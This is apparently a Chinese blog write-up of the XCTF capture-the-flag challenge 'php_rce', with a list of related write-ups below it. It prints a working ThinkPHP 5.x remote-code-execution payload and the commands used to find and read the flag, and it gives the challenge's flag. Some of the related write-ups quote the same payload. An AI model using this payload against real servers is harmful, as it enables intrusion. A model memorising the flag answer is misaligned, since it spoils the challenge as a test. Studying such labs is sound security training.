XCTF WEB 高手进阶区 php_rce

最新推荐文章于 2022-08-02 15:54:00 发布
最新推荐文章于 2022-08-02 15:54:00 发布
阅读量303 收藏 2
点赞数 1
分类专栏: XCTF WEB 高手进阶区 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30076719/article/details/109500599
版权

这一题,看到rec,第一时间想到命令执行,打开链接,
在这里插入图片描述
提示ThinkPHP V5 ,V5就是第五个版本啦,据百度所知,ThinkPHP是一款国内流行的开源PHP框架,2018年被爆出存在可能的远程代码执行漏洞,受影响的版本包括5.0和5.1版本,那么很合理啦,这一题考的就是这个漏洞的利用,百度可得poc
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=

“=”后面就是加要执行的命令,那么好办了,执行如下:
ls
在这里插入图片描述好像没有找到想要的东西,那就根目录查找flag,执行find / -name ‘flag’
在这里插入图片描述皇天不负有心人,找到了flag目录,那就直接cat查看内容啦,执行cat /flag
在这里插入图片描述即可得到flag

附上flag:
flag{thinkphp5_rce}

YQK易乾坤
关注
专栏目录
网络攻防路6-xctf php_rce
大紫明宫空离境
11-15 223
目录 一 ,php_rce 二,解题 三 ,总结 一 ,php_rce 这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 二,解题 1 进入试题 2 访问http://220.249.52.133:38152/index.ph
XCTFWeb进阶部分 WriteUp(一)
野原新之助
10-24 827
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
XCTF php_rce
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 613
ThinkPHP 5.X远程命令执行漏洞 利用system函数远程命令执行 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 写入shell ?s=/index/\think\app/invokefunction&funct...
16、XCTF php_rce
山兔的博客
09-18 252
一打开网站,发现是thinkphp的cms框架。 看题目,暗示的很明显了。 命令执行漏洞 上dirsearch,跑一下 200 - 1KB - /favicon.ico 200 - 931B - /index.php 200 - 24B - /robots.txt 301 - 328B - /static -> http://111.200.241.244:63456/static/ 跑出来了。去验证了一下, User-agent: * Disallow: 没发现什么有用的
攻防世界XCTFphp_rce
末初的CSDN博客
03-13 3804
漏洞预警: https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 漏洞描述: 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 影响版本: Think...
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 318
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 244
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 273
前言 这两题涉及到的知识点有,ThinkPHP 的远程代码执行漏洞 以及 flask的 SSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE(远程命令
XCTF 逆向进阶Windows_Reverse1——WriteUp
qq_43547885的博客
02-20 1126
题目链接: Windows_Reverse1 答题过程 脱壳 首先将程序拖入 Exeinfo PE 中查看相关信息: 发现程序有upx壳, 使用upx -d将壳脱去: 脱壳显示成功, 但奇怪的是程序一运行就闪退. 先不讨论该问题, 最后再来研究. IDA PRO 分析程序 用 IDA PRO 打开该程序, 直接查看反编译代码, 发现程序逻辑非常清晰:int __cdecl main(int...
攻防世界web高手进阶Web_php_include
llx101388627的博客
03-06 268
攻防世界web高手进阶Web_php_include 进入链接,可以看到部分源码: 分析一下,这里可以用GET方式上传两个参数:hello和page 其中,page会先通过strstr(A,B)函数 [在A中查找是否有B] 检查其中是否有"php://",如果有则会通过str_replace(A,B,C)函数 [将C中所有A替换为B] 将"php://"删去。 所以基本上就不可能用php://伪协议 但可以尝试data://text/plain 我们如果要知道flag在哪里,首先得知道有哪些文件 而要
xctf攻防世界 Web高手进阶 command_execution
l8947943的博客
08-02 9630
Web应用防护系统(也称为网站应用级入侵防御系统。英文WebApplicationFirewall,简称WAF)。利用国际上公认的一种说法Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。如果没有开waf,将会出现网页被篡改等问题发生。...
xctf攻防世界 Web高手进阶 wtf.sh-150
l8947943的博客
01-08 979
1.进入环境,查看内容 一串奇奇怪怪的留言板内容,记着我们Login Register,搞个账户注册玩玩,登录进去后发现就是只能发个帖子。也没有什么可以利用的内容,于是使用dirsearch扫一扫,一通乱扫没有什么有用的信息,如图: 麻了,继续学习大佬们的writeup吧。 2. 问题分析 尝试路径穿越 查阅相关的资料: 目录穿越(directory traversal)是HTTP开发的一种形式,黑客在一个Web服务器上使用这个软件除了可以访问服务器的根目录外还可以访问目录里面的数据。 一些路径穿
【攻防世界 XCTFWEB 高手进阶 php_rce ——最全面、最直观的WP
algae
05-04 714
xctf攻防世界 Web高手进阶 web2
l8947943的博客
08-01 8787
base64_encode(string)使用MIMEbase64对数据进行编码。substr(string,start,length)返回字符串的一部分。如果把已编码的字符串作为参数,那么将返回原始字符串。str_rot13(string)对字符串执行ROT13编码。ord(string)返回字符串首个字符的ASCII值。chr()从指定的ASCII值返回对应的字符。strlen(string)返回字符串的长度。string所需要的字符串。......
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)
Onlyone_1314的博客
09-03 1156
先访问题目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
XCTF高手进阶web1_baby_web writeup
Mitchell_Donovan的博客
01-20 449
web1_baby_web 原题链接 key:php重定向 题目描述:想想初始页面是哪个 ①进入环境后页面显示只有HELLO WORLD 抬头看URL地址栏里访问的是1.php 根据题目描述,由初始页面想到index.php 尝试访问index.php,然而却又跳转到1.php ②思路碰壁,不妨先御剑扫描一下???? 发现只有一个1.php可以访问 猜测index.php应该是被重新定向到了1.php ③F12打开开发者模式查看“网络”模块 查看返回包发现确实有
攻防世界php_rce
weixin_59392781的博客
07-30 147
开始题目只说了rce 百度一下rec: 可能是让我们利用漏洞去找旗帜 看一下页面: php5确实有漏洞 查百度: 随便复制一个 提示为5.0.20的: 继续找5.0的漏洞 找见一个发现能用: 接下来就是疯狂ls加cat ls …/…/…里有flag,但不是flag.txt flag{thinkphp5_rce} ...
攻防世界web高手进阶php_rce,攻防世界 web高手进阶 1-5 2020.6.11
weixin_35962351的博客
03-09 337
前言继续ctf的旅程攻防世界web高手进阶的1-5题1、baby_web进去是个1.php页面里只有helloworld按题意是说想看初始网页猜测有index.php结果直接跳转到1.php查看源码在index的请求头里发现flag2、Training-WWW-Robots这题不就是个robots嘛没什么好说的了进入robots.txt发现php进入php发现flag3、Web_python_t...
xctfphp_rec的writeup,第十届全国大学生信息安全竞赛writeup
weixin_32589877的博客
03-13 1334
1.PHP execise 类型:WEB 分值:150分直接就能执行代码,先执行phpinfo(),发现禁用了如下函数assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl...
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值